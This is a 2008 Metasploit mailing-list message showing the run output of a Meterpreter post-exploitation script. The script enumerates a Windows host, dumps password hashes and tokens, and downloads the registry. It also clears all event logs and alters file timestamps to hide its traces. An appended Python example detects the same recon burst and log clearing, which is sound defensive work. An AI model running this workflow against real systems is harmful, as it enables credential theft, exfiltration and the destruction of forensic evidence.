Metasploit mailing list archives
Fwd: Script for automating Information Gathering in windows Hosts
From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Sun, 14 Dec 2008 22:25:40 -0400
Forgot to include the rest of the mailing list on the email

---------- Forwarded message ----------
From: Carlos Perez <carlos_perez at darkoperator.com>
Date: Sun, Dec 14, 2008 at 10:24 PM
Subject: Re: [framework] Script for automating Information Gathering in windows Hosts
To: natron <natron at invisibledenizen.org>

Natron,

I decided that the changes were easy, so I took a couple of minutes and made the changes; here is the result. Now I only have to work on getting the exit command to not bring the error message. You are given credit in the comments and on the functions of the code I just copy pasted. What do you think?

meterpreter > run winenum3 -h
Windows Local Enumerion Meterpreter Script by Darkoperator
Carlos Perez carlos_perez at darkoperator.com
Usage:
-h This help message.
-m Migrates the Meterpreter Session from it current process to a new one
-c Changes Access Time, Modified Time and Created Time of executables that where run on the target machine and clear the EventLog
-r Dumps, compresses and download entire Registry
[-] Error while running command run: exit
meterpreter > run winenum3 -m -c -r
[*] Launching hidden cmd.exe...
[*] Process 2676 created.
[*] Current process is cmd.exe (3740). Migrating to 2676.
[*] Migration completed successfully.
[*] New server process: cmd.exe (2676)
[*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
[*] New session on 192.168.1.147:1050...
[*] Saving report to /tmp/192.168.1.147_20081214.173710156
[*] Checking if WIN2K301 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] This is a VMWare virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -na
[*] running command netstat -ns
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net localgroup
[*] running command net view /domain
[*] running command netsh firewall show config
[*] running command tasklist /svc
[*] Running WMIC Commands ....
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group
[*] running command wimic service list brief
[*] running command wimic volume list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic qfe
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Dumping and Downloading the Registry
[*] Exporting HKCU
[*] Compressing HKCU into cab file for faster download
[*] Exporting HKLM
[*] Compressing HKLM into cab file for faster download
[*] Exporting HKCC
[*] Compressing HKCC into cab file for faster download
[*] Exporting HKCR
[*] Compressing HKCR into cab file for faster download
[*] Exporting HKU
[*] Compressing HKU into cab file for faster download
[*] Downloading HKCU.cab to -> /tmp/192.168.1.147-HKCU.cab
[*] Downloading HKLM.cab to -> /tmp/192.168.1.147-HKLM.cab
[*] Downloading HKCC.cab to -> /tmp/192.168.1.147-HKCC.cab
[*] Downloading HKCR.cab to -> /tmp/192.168.1.147-HKCR.cab
[*] Downloading HKU.cab to -> /tmp/192.168.1.147-HKU.cab
[*] Deleting left over files 1
[*] Clearing Event Logs, this will leave and event 517
[*] Clearing the security Event Log
[*] Clearing the system Event Log
[*] Clearing the application Event Log
[*] Clearing the directory service Event Log
[*] Clearing the dns server Event Log
[*] Clearing the file replication service Event Log
[*] Alll Event Logs have been cleared
[*] Changing Access Time, Modified Time and Created Time of Files Used
[*] Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\route.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\net.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe
[*] Done!
meterpreter >

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081214/4e4cf686/attachment.htm>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: winenum3.rb
Type: application/x-ruby
Size: 13002 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081214/4e4cf686/attachment.rb>
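
A defender-side view of the session above, added here as an example and not part of the original message or of winenum3.rb: the command list in the output forms a recognisable burst of process launches, and the script's own output notes that clearing the logs leaves event 517. The record layout, host names, thresholds and sample records are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Prefixes taken from the "Running Command List" output in the message above.
RECON = ("arp -a", "ipconfig /all", "ipconfig /displaydns", "route print",
         "net view", "netstat -na", "netstat -ns", "net share", "net group",
         "net user", "net localgroup", "netsh firewall show config",
         "tasklist /svc")
PROC_CREATED = 592  # process-creation audit event on Windows XP/2003
LOG_CLEARED = 517   # the event the script's own output says is left behind

def recon_label(cmdline):
    """Return the recon prefix a command line matches, or None."""
    c = " ".join(cmdline.lower().split())
    # Longest prefix first, so "net view /domain" still counts as "net view".
    for p in sorted(RECON, key=len, reverse=True):
        if c == p or c.startswith(p + " "):
            return p
    return None

def find_bursts(events, window=timedelta(seconds=120), min_distinct=6):
    """events: (timestamp, host, event_id, cmdline) tuples in any order.
    Returns {host: {"distinct": n, "log_cleared": bool}} for every host where
    at least min_distinct different recon commands start within one window."""
    by_host = {}
    for ts, host, eid, cmd in sorted(events, key=lambda e: e[0]):
        by_host.setdefault(host, []).append((ts, eid, cmd))
    alerts = {}
    for host, evs in by_host.items():
        hits = [(ts, recon_label(cmd)) for ts, eid, cmd in evs
                if eid == PROC_CREATED and recon_label(cmd)]
        best, start = 0, None
        for t0, _ in hits:
            seen = {lab for t, lab in hits if t0 <= t <= t0 + window}
            if len(seen) > best:
                best, start = len(seen), t0
        if best >= min_distinct:
            cleared = any(eid == LOG_CLEARED and ts >= start for ts, eid, _ in evs)
            alerts[host] = {"distinct": best, "log_cleared": cleared}
    return alerts

# Constructed sample records (not real logs): a burst on HOST-A, an admin on HOST-B.
T0 = datetime(2008, 12, 14, 17, 37, 0)
SAMPLE = [(T0 + timedelta(seconds=2 * i), "HOST-A", PROC_CREATED, c)
          for i, c in enumerate(RECON[:8] + ("net view /domain",))]
SAMPLE.append((T0 + timedelta(seconds=90), "HOST-A", LOG_CLEARED, ""))
SAMPLE += [(T0, "HOST-B", PROC_CREATED, "ipconfig /all"),
           (T0 + timedelta(minutes=30), "HOST-B", PROC_CREATED, "netstat -na")]
```

Because the local logs are cleared at the end of the run, a rule like this only helps when process-creation and log-clear events are forwarded off the host as they occur.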